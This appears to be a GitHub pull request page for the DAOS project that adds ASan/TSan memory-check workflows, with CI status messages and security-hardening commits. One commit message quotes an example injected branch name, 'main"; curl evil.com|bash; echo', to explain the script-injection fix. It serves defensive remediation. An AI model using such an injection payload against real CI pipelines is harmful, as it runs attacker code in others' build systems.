DAOS-18626 cq: ASAN Men check with GitHub Action#18557
Conversation
|
Ticket title is 'ASAN Men check with GitHub Action' |
49ca01a to
513c51b
Compare
513c51b to
9ca93b1
Compare
|
Test stage Functional on EL 9 completed with status FAILURE. https://jenkins-3.daos.hpc.amslabs.hpecorp.net//job/daos-stack/job/daos/view/change-requests/job/PR-18557/3/execution/node/1059/log |
|
You are seeing this message because GitHub Code Scanning has recently been set up for this repository, or this pull request contains the workflow file for the Code Scanning tool. What Enabling Code Scanning Means:
For more information about GitHub Code Scanning, check out the documentation. |
|
Test stage Functional Hardware Large MD on SSD completed with status FAILURE. https://jenkins-3.daos.hpc.amslabs.hpecorp.net//job/daos-stack/job/daos/view/change-requests/job/PR-18557/12/execution/node/1330/log |
9bb48e6 to
1929d2b
Compare
Fixes three issues flagged by GitHub Scorecard on PR #18557: 1. [CRITICAL score=0] Dangerous-Workflow: script injection in memcheck.yml The 'Resolve SARIF ref and SHA' step interpolated GitHub context values (${{ github.event.pull_request.head.ref }}, etc.) directly into a bash run: block. A PR branch name containing shell metacharacters (e.g. 'main"; curl evil.com|bash; echo') would execute arbitrary code. Fix: pass all context values through an env: block and reference them as ${ENV_VAR} in the shell, following GitHub's recommended remediation. 2+3. [WARNING score=7] Token-Permissions: top-level permissions in tsan.yml security-events: write and checks: write were set at the workflow top level. Best practice is to set permissions at the job level so that only the specific job that needs them receives elevated access. Fix: remove the top-level permissions block from tsan.yml and add a permissions: section directly under the build-daos_tsan job. Signed-off-by: Cedric Koch-Hofer <cedric.koch-hofer@hpe.com>
Fixes three open Scorecard findings from PR #18557: 1. Pinned-Dependencies (score=3): codeql-action/upload-sarif@v4 is a floating tag. Scorecard requires actions to be pinned by full commit SHA to prevent supply-chain attacks. Fix: replace @v4 with @8aad20d150bbac5944a9f9d289da16a4b0d87c1e (v4.36.2) in both memcheck.yml (2 occurrences) and tsan.yml (1). This SHA is already used by other workflows in the repository. 2. Token-Permissions (score=8): no top-level permission defined in tsan.yml after we moved permissions to job-level. Scorecard requires an explicit top-level permissions block so any future job added to the workflow gets the minimum access (read-only) by default. Fix: add 'permissions: {}' at workflow top-level in tsan.yml. Note: Token-Permissions score=8 for 'jobLevel checks: write' in tsan.yml (finding 3490170495) is expected and accepted — this permission is required by the action-junit-report action to post test result checks, and the same pattern is used without issue in memcheck.yml. Signed-off-by: Cedric Koch-Hofer <cedric.koch-hofer@hpe.com>
6e5ef4b to
98995d5
Compare
7dfbd60 to
f798de2
Compare
|
Test stage Python Bandit check completed with status FAILURE. https://jenkins-3.daos.hpc.amslabs.hpecorp.net//job/daos-stack/job/daos/view/change-requests/job/PR-18557/46/execution/node/434/log |
|
Test stage Python Bandit check completed with status FAILURE. https://jenkins-3.daos.hpc.amslabs.hpecorp.net//job/daos-stack/job/daos/view/change-requests/job/PR-18557/47/execution/node/436/log |
0fe6c20 to
678e4a0
Compare
|
Test stage Python Bandit check completed with status FAILURE. https://jenkins-3.daos.hpc.amslabs.hpecorp.net//job/daos-stack/job/daos/view/change-requests/job/PR-18557/48/execution/node/434/log |
678e4a0 to
08e21c2
Compare
|
Test stage Python Bandit check completed with status FAILURE. https://jenkins-3.daos.hpc.amslabs.hpecorp.net//job/daos-stack/job/daos/view/change-requests/job/PR-18557/49/execution/node/433/log |
08e21c2 to
3012815
Compare
|
Test stage Python Bandit check completed with status FAILURE. https://jenkins-3.daos.hpc.amslabs.hpecorp.net//job/daos-stack/job/daos/view/change-requests/job/PR-18557/50/execution/node/434/log |
|
Test stage Unit Test completed with status UNSTABLE. https://jenkins-3.daos.hpc.amslabs.hpecorp.net/job/daos-stack/job/daos//view/change-requests/job/PR-18557/50/testReport/ |
|
Test stage Unit Test with memcheck completed with status UNSTABLE. https://jenkins-3.daos.hpc.amslabs.hpecorp.net/job/daos-stack/job/daos//view/change-requests/job/PR-18557/50/testReport/ |
3012815 to
29af6c0
Compare
| @@ -0,0 +1,268 @@ | |||
| # SPDX-License-Identifier: BSD-2-Clause-Patent | |||
| artifact_name: 'test-results-unit' | ||
| check_name: 'Unit Testing' | ||
| permissions: | ||
| checks: write |
| artifact_name: 'test-results-asan' | ||
| check_name: 'Unit Test Results (ASan build)' | ||
| permissions: | ||
| security-events: write |
| check_name: 'Unit Test Results (ASan build)' | ||
| permissions: | ||
| security-events: write | ||
| checks: write |
| artifact_name: 'test-results-tsan' | ||
| check_name: 'Unit Test Results (TSan build)' | ||
| permissions: | ||
| security-events: write |
| check_name: 'Unit Test Results (TSan build)' | ||
| permissions: | ||
| security-events: write | ||
| checks: write |
| artifact_name: 'test-results-ubsan' | ||
| check_name: 'Unit Test Results (UBSan build)' | ||
| permissions: | ||
| security-events: write |
| check_name: 'Unit Test Results (UBSan build)' | ||
| permissions: | ||
| security-events: write | ||
| checks: write |
|
Test stage Python Bandit check completed with status FAILURE. https://jenkins-3.daos.hpc.amslabs.hpecorp.net//job/daos-stack/job/daos/view/change-requests/job/PR-18557/51/execution/node/434/log |
|
Test stage Unit Test completed with status UNSTABLE. https://jenkins-3.daos.hpc.amslabs.hpecorp.net/job/daos-stack/job/daos//view/change-requests/job/PR-18557/51/testReport/ |
|
Test stage Unit Test with memcheck completed with status UNSTABLE. https://jenkins-3.daos.hpc.amslabs.hpecorp.net/job/daos-stack/job/daos//view/change-requests/job/PR-18557/51/testReport/ |
|
Test stage Python Bandit check completed with status FAILURE. https://jenkins-3.daos.hpc.amslabs.hpecorp.net//job/daos-stack/job/daos/view/change-requests/job/PR-18557/52/execution/node/435/log |
|
Test stage Unit Test completed with status UNSTABLE. https://jenkins-3.daos.hpc.amslabs.hpecorp.net/job/daos-stack/job/daos//view/change-requests/job/PR-18557/52/testReport/ |
|
Test stage Python Bandit check completed with status FAILURE. https://jenkins-3.daos.hpc.amslabs.hpecorp.net//job/daos-stack/job/daos/view/change-requests/job/PR-18557/53/execution/node/436/log |
5582f20 to
1cd88d5
Compare
|
Test stage Python Bandit check completed with status FAILURE. https://jenkins-3.daos.hpc.amslabs.hpecorp.net//job/daos-stack/job/daos/view/change-requests/job/PR-18557/54/execution/node/435/log |
|
Test stage Python Bandit check completed with status FAILURE. https://jenkins-3.daos.hpc.amslabs.hpecorp.net//job/daos-stack/job/daos/view/change-requests/job/PR-18557/55/execution/node/435/log |
|
Test stage Unit Test completed with status UNSTABLE. https://jenkins-3.daos.hpc.amslabs.hpecorp.net/job/daos-stack/job/daos//view/change-requests/job/PR-18557/55/testReport/ |
|
Test stage Unit Test with memcheck completed with status UNSTABLE. https://jenkins-3.daos.hpc.amslabs.hpecorp.net/job/daos-stack/job/daos//view/change-requests/job/PR-18557/55/testReport/ |
…caffold TODO Signed-off-by: Cedric Koch-Hofer <cedric.koch-hofer@hpe.com>
1cd88d5 to
3036055
Compare
|
Test stage Python Bandit check completed with status FAILURE. https://jenkins-3.daos.hpc.amslabs.hpecorp.net//job/daos-stack/job/daos/view/change-requests/job/PR-18557/56/execution/node/434/log |
TODO
Steps for the author:
After all prior steps are complete: